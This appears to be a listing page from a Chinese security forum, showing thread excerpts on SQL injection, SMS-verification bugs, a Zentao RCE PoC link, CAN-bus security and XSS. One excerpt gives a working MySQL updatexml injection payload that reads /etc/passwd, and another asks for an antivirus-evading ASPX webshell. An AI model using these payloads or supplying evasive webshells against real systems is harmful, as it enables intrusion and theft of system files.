安全研究
求助MySQL delete语句 updatexml报错注入问题? 求助大佬!
事情是这样的:被带入的数据库SQL:DELETE FROM polloptions WHERE polloptionid='146640' and updatexml(1,concat(0x7e,substr((select LOAD_FILE('/etc/passwd')),1,31),0x7e),1)-- +' AND tid='18'报错回显:XPATH syntax error: '~root:x:0:0:root:/root:/bin/bash'这个使用updatexml函数 报错注入
苹果系统ipa安装包导出求助
1、想要导出苹果手机里安装的app安装包,坛子里搜索了一下好像没有搜到类似的贴子,还请各位大神指点一二,很多不是正规app store里下载的app应用,我需要将这个安装包导出,或者应用被删除了不知道还能不能找到原始安装包?2、安卓系统被卸载或者删除的app,原始安装包是否还能在设备里找到导出?
【重发】车联网安全-总线安全(一)
对于车联网比较陌生的小伙伴可能不太清楚总线是什么,这里给大家简单介绍下,总的来说就是车内各个零部件控制,通信的作用:汽车总线(automotive bus)随着汽车各系统的控制逐步向自动化和智能化转变,汽车电气系统变得日益复杂。传统的电气系统大多采用点对点的单一通信方式,相互之间少有联系,这样
分享一个国外关于NodeJS安全的PDF
{:6_416:} {:6_416:} 覆盖面相对较全,XSS\CSRF\RCE\安全配置\相关书籍\课程等,但是估计是演讲用的PPT所以自身内容不够细致,还是有可学习之处的。部分内容原文链接https://archive.fosdem.org/2019/schedule/event/testing_nodejs_security/attachments/slides/2965/export/events/attachments/testi
关于js的一些知识总结
# 1. 渗透测试资产收集## 1.1 企业资产收集- 文章:https://www.t00ls.com/thread-68925-1-7.html## 1.2 隐形资产收集-host碰撞- 工具及原理:https://github.com/cckuailong/hostscan- 利用方式参考:https://xz.aliyun.com/t/9590## 1.3 子域名搜集> https://github.com/shmilylty/OneForAll## 1.4 j
SRC短信验证码漏洞挖掘技巧
个人认为src挖洞成就高低与个人经验和付出的时间成正比,此贴意在汇总t00ls各路大神挖洞tips。可以是一个功能点的非常规测试思路,也可以是某种类型漏洞的非常规测试思路。如:1、短信轰炸漏洞tips发送验证码时,F12控制台调试,可通过分析js代码,查看手机号次数发送逻辑,以便分析使用何种字符绕过。
疑似主机被入侵,发现存疑文件,望师傅们分析分析
事情的起因是,在进程中发现了一个NSecRTS.exe的进程,怎么也杀不掉,并且pid一直在变换,网上搜了一下,发现了几个几年前的文章《彻底解决NSEC病毒》《NSecRTS.exe可疑程序操作,进程无法关闭》等,于是怀疑自己安乱七八糟的工具被上线了;追到目录后发现可疑文件目录被设置了隐藏属性,之后在进程的路
大佬们,求个aspx免杀大马和思路
现在情况是遇见一个.net4.0的站,传了免杀的哥斯拉冰蝎马,连接不上,马没有被杀;怀疑有流量设备,所以想传个大马,网上找了很多大马,要么被杀,要么报错;报错信息如下,因为我菜鸡不懂代码,所以希望有师傅可以分析一下情况或者给个好马子;师傅还可以简单讲讲出现这种情况的原因的话那最好不过了{
禅道系统权限绕过到命令执行【分享】
###0x01 前言 ####最近看到禅道出新洞了,禅道系统权限绕过到命令执行,看到八卦水区有人要脚本,就顺手发一下###0x02 Github版 Github的脚本 https://github.com/webraybtl/zentaopms_poc###0x03 人体工程学批量修改版####在github的脚本上修改1.增加了批量扫描2.去除了报错3.增加了zentao目录
一次 SAAS服务商的XSS漏洞思路分享
闲下来重新写一次,当时写的太水被批评了。到现在我也觉得是挺有意思的SAAS渗透思路。这是我第一次碰到SAAS服务商做的渗透测试,如果我分享的内容落伍了请轻喷。 首先介绍一下SAAS,SaaS是Software-as-a-Service(软件即服务)的首字母缩写,他是21世纪兴起的一种与互联网深度融合的新型模式。SaaS
